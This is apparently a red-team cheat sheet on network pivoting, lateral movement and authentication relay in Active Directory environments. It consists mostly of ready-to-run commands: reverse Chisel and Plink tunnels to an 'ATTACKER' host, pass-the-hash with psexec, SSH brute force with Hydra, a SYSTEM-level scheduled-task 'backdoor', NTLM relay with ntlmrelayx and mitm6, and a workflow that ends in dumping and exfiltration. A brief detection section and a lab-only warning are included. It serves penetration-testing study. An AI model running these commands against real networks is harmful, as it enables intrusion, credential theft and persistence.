Network Exploitation & Pivoting
Network Exploitation & Pivoting — Lateral Movement, Tunneling, and Relay Mastery
⚠️ Authorized labs and controlled networks only. Mastering pivoting and lateral movement means mastering the invisible network — this is how attackers and red teams map, move, and persist after foothold.
I. 🧩 Core Concepts
Pivoting
Using a compromised host to reach internal systems not directly accessible.
Tunneling
Redirecting traffic from one network to another via encrypted or proxy channels.
Port Forwarding
Exposing remote internal ports to your local system.
Lateral Movement
Moving from one compromised system to another using credentials, trust, or protocol.
Relay Attacks
Capturing and relaying authentication (NTLM, Kerberos, etc.) for unauthorized access.
II. 🧭 Initial Network Enumeration (Post-Foothold)
🔹 Network Info
ip a
netstat -tulnp
ip route
arp -aipconfig /all
route print
arp -a
netstat -ano🔹 Discover Internal Targets
Linux
nmap -sn 10.10.0.0/24 for i in $(seq 1 254); do ping -c1 10.10.0.$i | grep "bytes from"; doneWindows
for ($i=1; $i -le 254; $i++) { Test-Connection -Count 1 -Quiet 10.10.0.$i }
🔹 Service Identification (proxychains or local)
nmap -sT -Pn -p 21,22,80,135,139,445,3389,5985,1433,3306 10.10.0.0/24III. 🧱 Port Forwarding Basics
🔹 SSH Local Forward
Redirect a remote internal port to your local machine.
ssh -L 8080:10.10.0.5:80 user@pivot
# Access via http://127.0.0.1:8080🔹 SSH Remote Forward
Expose your local listener to the remote internal network.
ssh -R 4444:127.0.0.1:4444 user@pivot
# Connect from pivot: nc 127.0.0.1 4444🔹 Dynamic SOCKS Proxy (via SSH)
ssh -D 9050 user@pivot
proxychains nmap -sT -Pn -p 445,3389 10.10.0.0/24Configure
/etc/proxychains.conf→socks5 127.0.0.1 9050.
IV. 🧠 Advanced Pivoting Tools
Chisel
TCP tunnel / SOCKS proxy
chisel server -p 8000 --reverse
chisel client ATTACKER:8000 R:1080:socks
Socat
Simple port forwarder
socat TCP-LISTEN:4444,fork TCP:10.10.0.5:3389
Plink
Windows SSH tunnel
plink.exe -ssh user@ATTACKER -R 4444:127.0.0.1:3389
FRP (Fast Reverse Proxy)
Full-feature reverse tunnel framework
Use for AD labs (multiple services)
SSHuttle
Transparent network-level proxy
sshuttle -r user@pivot 10.10.0.0/24
V. 🔁 Pivot Enumeration (Through Tunnels)
Once SOCKS tunnel is active:
proxychains nmap -sT -Pn -p 80,445,3389 10.10.0.0/24
proxychains crackmapexec smb 10.10.0.0/24 -u user -p pass
proxychains smbclient -L \\10.10.0.5\\ -U user🧠 Tip: Always pivot layer by layer — confirm internal network segments with route print and ARP sweeps before chaining.
VI. 💣 Lateral Movement Techniques
🔹 Windows (Internal)
WinRM
evil-winrm -i 10.10.0.5 -u user -p pass
SMB/IPC
psexec.py corp.local/[email protected] -hashes :NTLMHASH
WMI
wmiexec.py user@target
RDP
xfreerdp /v:10.10.0.5 /u:user /p:pass
Scheduled Task
schtasks /create /tn backdoor /tr payload.exe /sc onlogon /ru SYSTEM
Service Abuse
Replace or reconfigure service binary.
🔹 Linux (Internal)
SSH Key Reuse
Password Reuse
hydra -l user -P passlist.txt ssh://10.10.0.5
Rsync, NFS
Abuse writable shares.
Cron Hijack
Replace cross-host sync scripts.
Ansible/SaltStack
Misconfigured management tools.
VII. 🧠 Authentication Relay Attacks (AD)
LLMNR/NBNS Poisoning
Capture and relay NTLM
Responder
NTLM Relay (SMB/HTTP)
Relay captured hashes
ntlmrelayx.py -tf targets.txt -smb2support
ADCS Relay (Cert Attack)
Relay NTLM to ADCS HTTP endpoint
ntlmrelayx --adcs
Printer Bug (SpoolSample)
Force authentication from DC
spoolsample.py
IPv6 MITM (MITM6)
DNS poisoning in AD
mitm6 -d corp.local
🧠 Combine Responder + ntlmrelayx + impacket for chained exploitation.
VIII. ⚙️ Multi-Hop Pivot Scenarios
Example: 3-Layer Chain
[Attacker] ──> [Public Foothold] ──> [Internal Jump Box] ──> [DC]Setup:
1️⃣ chisel server -p 8000 --reverse on Attacker
2️⃣ On Public Foothold:
./chisel client ATTACKER:8000 R:1080:socks3️⃣ On Jump Box:
proxychains nmap -sT -Pn 10.10.10.0/244️⃣ Access DC via proxy: proxychains evil-winrm -i 10.10.10.5 -u user -p pass
IX. 🧰 Post-Pivot Enumeration (AD/Enterprise)
Domain Controllers
net view /domain
Identify DCs
Shares
smbclient -L \\host\\ -U user
Sensitive data
Logged-in Users
net session / qwinsta
Target movement
Tickets
klist
Check current Kerberos creds
Groups
net group "Domain Admins" /domain
Enumerate admins
X. 🧱 C2 & Tunneling Frameworks (Red-Team Level)
Covenant / Empire / Sliver / Mythic
Full C2 with lateral modules
Metasploit multi/handler
Reverse shell management
Merlin Agent
HTTP/2 encrypted C2
Nimplant / PoshC2
PowerShell-based operations
Ghostpack tools (C#)
Internal AD lateral modules
XI. 🔒 Defense & Detection (Blue/Purple Notes)
Port Forwarding
IDS / anomalous open ports
Sysmon ID 3
SSH Tunnels
Unusual long-lived SSH sessions
Firewall logs
NTLM Relay
SMB/HTTP anomalies
Event 4624 Type 3 burst
Chisel/Socat
Custom TCP tunnel
network heuristics
Lateral Movement
Multiple logons from same user
Event 4624 Type 10/3
RDP
Brute/odd IP connections
Event 1149
SOCKS Proxy Use
DNS anomalies
Proxy logs
XII. 🧠 Pivoting Workflow Summary
1️⃣ Identify internal network
2️⃣ Forward one internal service to local
3️⃣ Enumerate behind the pivot
4️⃣ Establish persistent tunnel (Chisel/SSH)
5️⃣ Use proxychains for internal scans
6️⃣ Move laterally via SMB/WinRM/RDP
7️⃣ Pivot deeper or reach DC
8️⃣ Dump / escalate / exfil / cleanupXIII. 🧱 One-Liner Arsenal
Forward port (Linux)
socat TCP-LISTEN:8080,fork TCP:10.10.0.5:80
Reverse tunnel (SSH)
ssh -R 8080:localhost:8080 user@pivot
SOCKS proxy (SSH)
ssh -D 1080 user@pivot
Proxy scan
proxychains nmap -sT -Pn -p 80,445 10.10.0.0/24
List internal network (PowerShell)
Get-NetIPAddress
Ping sweep (CMD)
`for /L %i in (1,1,254) do @ping -n 1 10.10.0.%i
XIV. 🧩 Common Pivot Scenarios (HTB / Enterprise)
Linux foothold → Windows internal
chisel SOCKS + proxychains + evil-winrm
Windows foothold → Linux internal
plink reverse + proxychains
No direct egress
use reverse chisel tunnel or ICMP shell
Firewall between subnets
pivot via RDP or SMB relay
Isolated internal segment
SSHuttle, SOCKS chain, or VPN injection
XV. ⚙️ Cleanup
ps aux | grep chisel; kill -9 PID
rm /tmp/chisel /tmp/socat
unset HTTP_PROXY HTTPS_PROXYtaskkill /IM plink.exe /F
netsh interface portproxy reset all🧠 Always restore routing rules after lab testing.
Last updated
Was this helpful?